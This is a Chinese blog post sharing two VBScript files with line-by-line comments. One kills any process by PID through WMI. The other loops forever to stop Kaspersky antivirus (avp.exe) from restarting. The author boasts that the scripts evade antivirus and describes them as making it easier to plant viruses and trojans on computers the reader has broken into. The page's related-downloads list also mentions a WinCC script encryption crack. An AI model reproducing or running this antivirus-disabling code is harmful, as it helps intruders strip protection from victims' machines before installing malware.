`
hereson
  • 浏览: 1444488 次
  • 性别: Icon_minigender_1
  • 来自: 苏州
社区版块
存档分类
最新评论

两个简易VBS脚本结束进程与防止进程启动

    博客分类:
  • vbs
阅读更多
今天下午没课,躲进私人空间开始思考些问题。在浏览VBS相关案例时,自己写了两个小程序出来,有Hack性质的(其实只要能“借刀杀人”,什么软件没黑客性质?- -!)。Kill.vbs用来在cmd下结束进程,Dis.vbs用来在窗口模式下防止某进程再次启动。这两个VBS都不会被杀毒软件KILL掉,并且有一定的隐蔽性……看代码!('为注释)

Kill.vbs:

for each ps in getobject _
("winmgmts:\\.\root\cimv2:win32_process").instances_ '涉及到WMI脚本入侵技术,我不能解释清楚!
if ps.handle=wscript.arguments(0) then  '判断进程的PID号是否与获得的PID号参数相等
wscript.echo ps.terminate '如果相等就结束指定PID号对应的进程
end if
next

Dis.vbs

dim y,x '不要这行也行……
do '来个死循环……一直在判断!do ... loop内为循环体!
set y=getobject("winmgmts:\\.\root\cimv2") '和上面解释一样,这也是涉及到微软的WMI技术!
set x=y.execquery("select * from win32_process where name='avp.exe'")
'查询语句,where后判断avp.exe(卡巴)是否存在进程中!
'这样当卡巴被上面的Kill.vbs结束时就再也启动不起来了。除非,把Dis.vbs结束了先……
for each i in x
i.terminate()  '卡巴要启动马上就终止……
next
wscript.sleep
loop

解释够清楚了,那就来看看这两个vbs是如何工作的吧。我将Kill.vbs与Dis.vbs放在C盘根目录下。

打开cmd,输入cd\回到C盘根目录下,输入tasklist查看当前系统的进程情况,然后记下你想kill的进程的PID号,输入cscript Kill.vbs 2200即可结束PID为2200的进程了!假如这个进程是avp.exe,那你就可以输入Dis.vbs启动Dis.vbs来防止卡巴继续被启动。Dis.vbs启动时仅在任务管理器的进程中有wscript.exe进程项,要是不结束这个进程是无法再次启动卡巴的。

懂得这些,为以后入侵他人电脑后上传病毒、木马之类的就更方便了一点点……上面的所有过程都经本人试验成功了,继续完善……
分享到:
评论

相关推荐

    分享一个结束VBS进程的脚本

    网上下载的那些无限弹出的代码,对于小白来说,不知道怎么处理;大神会打开任务管理器去结束进程,现在有了这个,可以一键关闭正在使用中的VBS脚本进程,方便快捷,一键搞定

    VBS实例 44个 vbs脚本实例

    VBS实例 44个 vbs脚本实例, VBS取QQ-TM号码的自动登录命令行.vbs 妙用脚本清除电脑中的痕迹.vbs 后台字典文件管理器.vbs 定时关机.vbs 列出管理工具集.vbs 旁注查询工具.vbs 中文姓名笔画计算(VBS脚本版).vbs ...

    VBS脚本执行exe

    除了单个执行exe文件外,还可以通过VBS脚本来实现多个exe文件的自动化启动。比如,可以通过循环结构来遍历某个文件夹内的所有exe文件,并逐一执行它们。这种方法非常适合在需要批量处理大量应用程序的场景下使用。 ...

    wincc vbs脚本手册

    wincc vbs脚本手册 西门子 组态 脚本

    显示所有进程vbs脚本

    在这个特定的场景中,"显示所有进程vbs脚本"是用来查看系统当前正在运行的所有进程的工具。这样的脚本可以帮助用户监控系统资源的使用情况,找出可能的性能瓶颈或者潜在的安全风险。 在Windows操作系统中,进程是...

    WinCC常用C和VBS脚本.pdf

    WinCC是西门子提供的一款用于监控和控制工业系统的软件,而C脚本和VBS脚本是WinCC中支持的两种脚本语言,分别代表C语言风格的脚本和Visual Basic Scripting Edition(VBS)风格的脚本。 1. WinCC脚本基础 在WinCC...

    c++调用vbs脚本函数(Qt)

    标签“c++ vbs 脚本”进一步确认了这个话题的重点,即C++与VBScript之间的互操作性。 压缩包中的"QtVbscriptExample"可能包含了一个完整的项目,包括了C++源码、VBScript脚本文件,以及可能的编译配置。源码可能...

    vbs脚本实例,关闭打开程序

    VBS脚本实例,用来判断指定的进程是否存在,关闭指定的进程,打开执行的程序

    VBS脚本编程简明教程

    一、VBS脚本的引入与优势 在Windows操作系统中,用户常面临重复性高的计算机操作任务,如文件管理、文本编辑及数据整理等,这些任务虽然简单但耗时费力。VBS(Visual Basic Script Edition)作为一种轻量级的脚本...

    vbs脚本手册

    VBS脚本运行库手册之一(磁盘操作) VBS脚本运行库手册之二(磁盘操作) VBS脚本运行库手册之三(管理文件夹) VBS脚本运行库手册之四(管理文件夹) VBS脚本运行库手册之五(文件夹属性) VBS脚本运行库手册之...

    vb调用vbs脚本

    在IT行业中,VB(Visual Basic)和VBS(Visual Basic Script)是两种广泛使用的编程语言。VB主要用于构建桌面应用程序,而VBS则常用于网页脚本和自动化任务。本文将详细探讨如何在VB中调用VBS脚本,以及相关的知识点...

    VBS脚本开发工具

    同时,了解如何利用VBS与DOS命令结合,可以实现更复杂的系统自动化任务,例如文件管理、系统监控和定时任务等。 VBS脚本开发工具还允许开发者进行调试,定位并修复脚本中的错误,这对于确保脚本的正确运行至关重要...

    VBS脚本学习指南,适合初学者

    ### VBS脚本学习指南——基础知识与应用 #### 一、VBS脚本概述 VBS,即Microsoft Visual Basic Script Edition(微软可视化BASIC脚本版),是Microsoft为Windows操作系统提供的一种轻量级脚本语言。它基于Visual ...

    helloworld vbs 脚本

    helloworld vbs 脚本hellohelloworld vbs 脚本world vbs 脚本helloworld vbs 脚本helloworld vbs 脚本helloworld vbs 脚本

    按键精灵VBS经典脚本教程

    VBS脚本是基于视窗系统的脚本语言,由于VBS脚本病毒的大量流行,我们对VBS的功能有了一个全新的认识。VBS脚本的执行离不开视窗系统Script Host(WSH),WSH是一种基于32位视窗系统平台的、和语言无关的脚本解释机制...

    wincc VBS脚本加密破解

    wincc VBS脚本加密破解

    windows常用bat/vbs脚本合集

    在Windows操作系统中,批处理(BAT)脚本和Visual Basic Script(VBS)脚本是两种常见的自动化工具,用于执行一系列命令或者实现特定的功能。这个"windows常用bat/vbs脚本合集"可能是包含了多种实用脚本的集合,旨在...

    vbs脚本,设置默认打印机

    在Windows环境中,VBS脚本可以通过与WScript或CScript交互来执行各种操作,包括对操作系统进行配置,如设置默认打印机。 设置默认打印机是系统管理中的常见任务,尤其在多用户共享打印机的服务器环境中,确保每个...

    c#(winform)调用VBS脚本

    4. 启动进程:调用Process的Start方法来执行VBS脚本。 ```csharp process.Start(); ``` 5. 处理脚本输出(可选):如果你需要读取VBS脚本的输出,可以使用`process.StandardOutput.ReadLine()`方法。 ```csharp ...

    VBS脚本大全

    VBS脚本是一个功能强大且易于使用的脚本语言,它可以自动化Windows操作系统的任务,批量处理文件,发送Email,控制外部应用程序等。通过学习VBS脚本,我们可以提高工作效率,自动化重复性的任务。

Global site tag (gtag.js) - Google Analytics